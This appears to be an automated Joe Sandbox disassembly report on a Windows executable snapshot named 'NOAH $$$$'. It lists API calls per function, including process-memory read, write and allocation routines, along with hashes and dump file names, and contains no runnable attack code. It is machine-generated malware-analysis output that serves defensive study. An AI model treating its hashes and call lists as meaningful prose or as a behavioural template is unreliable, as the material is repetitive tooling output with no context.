                                                                                                                                        • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                                        • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                                                                        • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                                        • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1489400265-0
                                                                                                                                        • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                        • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                                                        • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                        • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                                        • DestroyWindow.USER32(?), ref: 00455728
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1042038666-0
                                                                                                                                        • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                                        • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                                                        • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                                        • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2625713937-0
                                                                                                                                        • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                                                        • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                                                                                        • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                                                        • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                                                                                        APIs
                                                                                                                                        • __getptd.LIBCMT ref: 0041780F
                                                                                                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                                        • __getptd.LIBCMT ref: 00417826
                                                                                                                                        • __amsg_exit.LIBCMT ref: 00417834
                                                                                                                                        • __lock.LIBCMT ref: 00417844
                                                                                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 938513278-0
                                                                                                                                        • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                        • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                                                                        • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                        • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                                        • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                                        • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2403457894-0
                                                                                                                                        • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                                        • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                                                                                        • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                                        • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                                        • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                                        • __freefls@4.LIBCMT ref: 00415209
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4247068974-0
                                                                                                                                        • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                                        • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                                                                        • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                                        • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: )$U$\
                                                                                                                                        • API String ID: 0-3705770531
                                                                                                                                        • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                                                        • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                                                                                        • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                                                        • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                                                        • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                        • String ID: .lnk
                                                                                                                                        • API String ID: 886957087-24824748
                                                                                                                                        • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                                        • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                                                                        • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                                        • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: \
                                                                                                                                        • API String ID: 4104443479-2967466578
                                                                                                                                        • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                                                        • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                                                                                        • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                                                        • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: \
                                                                                                                                        • API String ID: 4104443479-2967466578
                                                                                                                                        • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                                                        • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                                                                                        • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                                                        • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: \
                                                                                                                                        • API String ID: 4104443479-2967466578
                                                                                                                                        • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                                                        • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                                                                                        • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                                                        • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                                                                                        Strings
                                                                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                        • API String ID: 708495834-557222456
                                                                                                                                        • Opcode ID: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                                                                                                                                        • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                                                                        • Opcode Fuzzy Hash: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                                                                                                                                        • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                                                          • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                                                          • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                                                          • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                                                          • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                                                        • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                                        • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                                        • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                                                        • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                                        • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                                                        APIs
